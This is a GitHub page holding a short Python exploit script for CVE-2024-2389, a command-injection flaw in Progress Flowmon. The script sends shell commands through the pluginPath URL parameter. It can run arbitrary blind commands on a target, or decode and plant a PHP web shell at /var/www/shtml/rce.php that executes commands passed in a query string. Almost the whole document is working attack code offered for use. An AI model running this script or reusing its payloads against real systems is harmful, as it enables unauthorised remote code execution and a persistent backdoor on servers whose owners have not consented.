-
Notifications
You must be signed in to change notification settings - Fork 239
/
CVE-2024-2389.py
26 lines (23 loc) · 1.17 KB
/
CVE-2024-2389.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import argparse
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser(description='Progress Flowmon RCE')
parser.add_argument('target', type=str, help='Target URL')
parser.add_argument('--cmd', type=str, help='Blind command to run', required=False)
parser.add_argument('--web-shell', action='store_true', help='Show command output')
args = parser.parse_args()
target = args.target
cmd = args.cmd
if args.web_shell:
print("[+] Writing webshell to /var/www/shtml/rce.php")
url = f"{target}/service.pdfs/confluence?file=userguide&lang=x&pluginPath=$(echo+PD9waHAgaWYoaXNzZXQoJF9HRVRbJ2NtZCddKSl7c3lzdGVtKCRfR0VUWydjbWQnXSk7fT8%2b+|+base64+-d+>/var/www/shtml/rce.php)"
elif args.cmd:
print("[+] Running command")
url = f"{target}/service.pdfs/confluence?file=x&lang=x&pluginPath=$({cmd})"
try:
requests.get(url, verify=False, timeout=1) # Time it out because sometimes the command will execute but the parent process hangs
except requests.exceptions.ReadTimeout or requests.exceptions.ConnectTimeout:
pass
if args.web_shell:
print(f"[+] Visit {target}/rce.php?cmd=ls")